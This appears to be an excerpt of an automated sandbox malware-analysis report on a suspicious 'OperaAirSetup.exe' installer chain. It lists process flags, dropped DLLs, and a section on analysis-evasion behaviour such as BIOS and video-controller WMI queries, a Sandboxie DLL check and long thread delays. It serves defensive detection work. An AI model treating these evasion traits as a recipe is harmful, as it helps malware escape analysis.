                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Temp\cmd.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Temp\cmd.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: FirmwareTableInformationJump to behavior
                        Source: OperaAirSetup.exe, 0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeMemory allocated: 3370000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeMemory allocated: 3280000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6466Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3276Jump to behavior
                        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 1056Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\bassenc_ogg.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-JNHPI.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-UDKGG.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_isdecmp.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_isdecmp.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\VBoxProxyStub.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-JLLE4.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\difxapi.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\Microsoft.Azure.Management.ResourceManager.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-40U72.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-SBTFQ.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\7za.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeEvaded block: after key decisiongraph_12-45332
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeAPI coverage: 6.3 %
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5648Thread sleep time: -120000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EB0582 FindFirstFileExW,12_2_00EB0582
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E88D04 FindFirstFileW,12_2_00E88D04
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E8A3FD GetSystemInfo,12_2_00E8A3FD
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: is-SBTFQ.tmp.10.drBinary or memory string: 0JvPartitionType_VMWareUnknownW@
